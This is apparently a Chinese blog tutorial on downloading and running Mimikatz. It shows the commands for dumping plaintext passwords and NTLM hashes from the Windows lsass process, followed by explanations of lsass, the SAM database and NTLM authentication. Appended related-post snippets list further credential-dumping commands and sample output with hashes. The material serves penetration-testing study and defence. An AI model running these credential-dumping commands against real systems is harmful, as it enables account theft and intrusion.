Mimikatz安装 lsass进程 SAM NTML

已于 2024-05-15 09:47:45 修改
阅读量885 收藏 17
点赞数 19
文章标签: 笔记
于 2024-05-14 22:01:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/138861922
版权

目录

什么是Mimikatz

Mimikatz在windows上安装及使用

mimkatz语法

mimikatz使用例子

lsass进程

SAM

NTML

什么是Mimikatz

Mimikatz是一款开源的Windows安全工具,由法国安全研究员Benjamin Delpy开发。它最初被设计为用于学习C语言和进行Windows安全性实验的工具。然而,由于其强大的功能,它也可以用来从Windows系统中提取敏感信息,如明文密码、哈希值、PIN码和Kerberos票据等。总的来所它可以获取windows系统内存的密码,提供其他域的攻击方式。

Mimikatz在windows上安装及使用

在下面地址下载

Release 2.2.0 20220919 Djoin parser & Citrix SSO Extractor · gentilkiwi/mimikatz · GitHub

下载之后解压

到解压之后的路径然后使用.\mimikatz.exe命令,使用该程序

mimkatz语法

模块名::参数

mimikatz使用例子

(获取windows明文密码)

1、以管理员身份打开cmd

2、在cmd中切换到你的mimikatz安装路径中,找到你对应的系统版本是x86还是32进去

cd D:\桌面\mimikatz_trunk\x64

3、进入软件

.\mimikatz

 4、提权

privilege::debug

结果

 

5、抓取用户密码

sekurlsa::logonpasswords

msv:这项是账户对应密码的各种加密协议的密文,可以看到有LM、NTLM和SHA1加密的密文

tspkg:这个就是账户对应的明文密码了。

wdigest:WDigest.dll是在Windows XP操作系统中引入的。它实现了摘要认证协议,该协议设计用于超文本传输协议(HTTP)和简单认证安全层(SASL)交换。

kerberos:Kerberos是一种计算机网络授权协议,主要用于在开放或非安全网络中,对个人通信以安全的手段进行身份认证。它通过引入可信任的第三方来实现客户端和服务端的认证,旨在通过使用密钥加密技术为客户端/服务端应用程序提供强身份验证。

SSP:是最新登录到其他RDP终端的账户和密码

但是现在微软在windows打了一个补丁,明文很难抓取到。想要破解可以用密文进行比对登陆。

lsass进程

lsass是一个Windows进程,负责处理操作系统的安全策略。例如当你登陆Windows用户账户或服务器是,lsass会验证登录名和密码。 

SAM

在Windows中,SAM(Security Account Manager)是安全帐户管理器的简写,是一个关键的Windows数据库,用于存储用户帐户凭据,包括用户名和哈希密码。

SAM文件没有扩展名,通常存储在c:\windows\system32\config\SAM目录和HKEY_LOCAL_MACHINE\SAM注册表中。在系统运行时,SAM文件受到严格保护,以防止直接复制或重新定位。这种保护是通过操作系统强制实施的独占文件系统锁来实现的。

在用户在本地或远程登录系统时,Windows会将输入的密码的哈希值与SAM文件中保存的哈希值进行对比,以验证用户身份。在Windows系统中,为了避免明文密码泄漏,SAM文件中保存的是明文密码经过一系列算法处理过的Hash值,被保存的Hash分为LM Hash、NTLM Hash。在后期的Windows系统中,SAM文件中被保存的密码Hash都被密钥SYSKEY加密。

尽管有这种保护,攻击者仍可能通过使用各种方法转储SAM文件的磁盘内容来提取密码哈希,以进行离线暴力攻击。

NTML

NTLM是微软用于Windows身份验证的主要协议之一。它是一套身份验证和会话安全协议,用于各种Microsoft网络协议的实现中,如HTTP、SMB、SMTP等协议。NTLM最初用于DCE/RPC的身份验证和协商,也在整个Microsoft系统中用作集成的单点登录机制(SSO)。

NTLM的前身是LAN Manager Challenge/Response验证机制(简称LM),但LM由于其简单性而容易被破解。因此,微软提出了NTLM身份验证协议,以及更新的NTLM V2版本。NTLM协议既可以为工作组中的机器提供身份验证,也可以用于域环境身份验证。它使用问询/应答的身份验证机制,避免了口令的直接传输,从而提高了安全性。

NTLM(NT LAN Manager)本地认证流程在Windows系统中主要涉及以下几个步骤:

用户登录:当用户尝试登录Windows系统时,系统会启动Windows Logon Process(winlogon.exe)程序,该程序负责提供用户交互界面,即登录界面。

密码输入:用户在登录界面上输入用户名和密码。

密码处理:系统将用户输入的密码传递给本地安全认证子系统服务(lsass.exe)。lsass.exe程序会对用户输入的密码进行NTLM Hash加密处理。

密码验证:lsass.exe程序会读取%SystemRoot%\system32\config\sam文件,该文件通过NTLM Hash算法存储了用户密码的哈希值。程序会将用户输入的密码的NTLM Hash值与存储在SAM文件中的相应哈希值进行比较。

认证结果:如果两个哈希值匹配,则认为用户身份验证成功,用户可以进入系统。如果哈希值不匹配,则认证失败,系统会拒绝用户登录。

NTLM认证过程是一种不安全的身份验证方式,因为密码是以明文形式传递给lsass.exe进行处理的,虽然最终存储的是密码的哈希值,但在传输过程中仍然存在被截获和破解的风险。为了提高安全性,建议使用更高级的认证方式,如NTLMv2或Kerberos。

不嫌弃的点点关注,点点赞 ଘ(੭ˊᵕˋ)੭* ੈ✩‧₊˚ 

板栗妖怪
关注
  • 19
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详解Windows渗透测试工具Mimikatz的内核驱动
weixin_60043341的博客
08-17 1115
Mimikatz通过其中包含的Mimidrv驱动程序,提供了利用内核模式的功能。Mimidrv是已经签名的Windows驱动模型(WDM)内核模式软件驱动程序,在相关命令前加上感叹号(!)即可与标准Mimikatz可执行文件共同使用。Mimidrv没有相应文档,并且很少被人使用,但它却提供了一个非常值得关注的方式,让我们可以在ring 0执行一些操作。本文详细分析Mimidrv提供的功能,提出了一些可供大家参考的文档,同时向不太了解内核的读者介绍一些核心概念,最后将提出用于缓解基于驱动的威胁的防范建议。..
mimikatz最新版本
11-20
mimikatz最新版本 嗅探hash
volatility安装+插件安装mimikatz
sbingmo的博客
07-11 1万+
volatility安装+插件安装mimikatz
内网渗透神器(Mimikatz)——使用教程,你会的还只有初级工程师的技术吗
最新发布
2401_84446919的博客
04-18 944
在域控上执行)查看域kevin.com内指定用户root的详细信息,包括NTLM哈希等。从sam.hive和system.hive文件中获得NTLM Hash。sr98: 用于SR98设备和T5577目标的RF模块。rdm: RDM(830AL)器件的射频模块。rpc: mimikatz的RPC控制。导出lsass.exe进程中所有的票据。(在域控上执行)读取所有域用户的哈希。acr: ACR模块。开启Wdigest Auth。关闭Wdigest Auth。
mimikatz 大面包 安装
qq_42764906的博客
05-10 632
得到安装包 之后 将软件加入白名单(白名单方法自行百度) (windows10 自带defender 杀毒软件 ) (360) 右键管理员方式运行,这点很重要,否则会出现 ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 恐怖吧! 好的指令链接: https://blog.csdn.net/pyphrb/articl...
kali安装volatility及插件mimikatz
qq_73722777的博客
09-14 3258
vol.py --plugins=[plugins文件夹路径] -f [镜像文件路径] --profile=[操作系统] mimikatz。下载解压后拖入kali内,文件夹改名为volatility,终端cd进入文件夹。下载后拖入volatility/volatility/plugins/解压后拖入kali,使用cd进入文件夹内。下载mimikatz.py文件。2.安装volatility。下载文件distorm3。3.安装mimikatz。4.在终端中使用插件。kali安装pip2。
Volatility安装遇到的问题之mimikatz插件安装
qq_42878458的博客
08-23 2327
数字取证学习
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
mimikatz-master源码
07-22
mimikatz-master
mimikatz获取系统密码
03-28
获取系统级别密码
mimikatz.rar
07-08
mimikatz 是一款windows平台下的神器,它具备很多功能,我认为最牛逼的是lsass.exe进程中获取windows的账号明文密码,当然他的其他功能也很强大。
神器mimikatz_trunk
01-24
32位 64位均可 不过在测试过程中 前掉至少得以ADMIN权限运行 法国黑客神器 mimikatz 直接读取管理员密码明文 通杀xp win2003 win7 win2008 WIN2000还未测试 个人感觉应该也可以 没打建环境测试 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 自己尝试了下用 win2008 r2 x64 来测试 总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~ mimikatz: Tool To Recover Cleartext Passwords From Lsass I meant to blog about this a while ago, but never got round to it. Here’s a brief post about very cool feature of a tool called mimikatz. I’m very grateful to the tool’s author for bringing it to my attention. Until that point, I didn’t realise it was possible to recover the cleartext passwords of logged on windows users. Something that I’m sure most pentesters would find very useful. Here’s some sample output provided by the author: mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */mimikatz # privilege::debugDemande d'ACTIVATION du privilège : SeDebugPrivilege : OKmimikatz # inject::process lsass.exe sekurlsa.dllPROCESSENTRY32(lsass.exe).th32ProcessID = 488Attente de connexion du client...Serveur connecté à un client !Message du processus :Bienvenue dans un processus distant Gentil KiwiSekurLSA : librairie de manipulation des données de sécurités dans LSASSmimikatz # @getLogonPasswordsAuthentification Id : 0;434898Package d'authentification : NTLMUtilisateur principal : Gentil UserDomaine d'authentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : passwordAuthentification Id : 0;269806Package d'authentification : NTLMUtilisateur principal : Gentil KiwiDomaine d'authentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a } wdigest : waza1234/ tspkg : waza1234/ I wondered why the cleartext password would need to be stored in LSASS – after all every pentester will tell you that you don’t need the password to authenticate, just the hash. A bit of googling seems to indicate that wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Posted in Blog
mimikatz2 0 最新 一键版
05-04
mimikatz2 0 最新 一键版 源码编译 32位 64位
mimikatz.exe windows密码查看
07-12
cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称---------结束进程 process::modules --列出系统的核心模块及所在位置 service::list---------------列出系统的服务 service::remove-----------移除系统的服务 service::start stop 服务名称--启动或停止服务 privilege::list---------------列出权限列表 privilege::enable--------激活一个或多个权限 privilege::debug-----------------提升权限------------------ nogpo::cmd------------打开系统的cmd.exe nogpo::regedit -----------打开系统的注册表 nogpo::taskmgr-------------打开任务管理器 ts::sessions-----------------显示当前的会话 ts::processes------显示进程和对应的pid情况等 sekurlsa::wdigest-----获取本地用户信息及密码 sekurlsa::tspkg------获取tspkg用户信息及密码 sekurlsa::logonPasswords--获登陆用户信息及密码----------------
mimikatz_trunk-1_mimikatz_
10-03
password decrypt windows
ONE DAY |网络安全渗透测试之跨网段攻击
EverUP
05-04 1826
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。
mimikatz的基本使用
a3320315的博客
05-25 9708
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
volatility2 with mimikatz|装mimikatz插件踩的坑
Rainy_Madison的博客
09-03 1811
volatility插件mimikatz安装过程
mimikatz木马
09-13
Mimikatz是一个知名的密码获取工具,它可以用于从Windows系统中提取敏感信息,如明文密码、哈希值和凭证等。由于其功能强大,Mimikatz也经常被黑客用作攻击工具,用于获取用户凭证并进行横向渗透。 值得注意的是,Mimikatz本身并不是一个木马程序,而是一个密码获取工具。然而,它的恶意使用方式可能会将其视为一种恶意软件。因此,在网络安全和保护个人隐私方面,我们都应该注意防范并采取相应的安全措施,例如定期更新操作系统和应用程序、使用强密码并定期更改、限制管理员权限等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值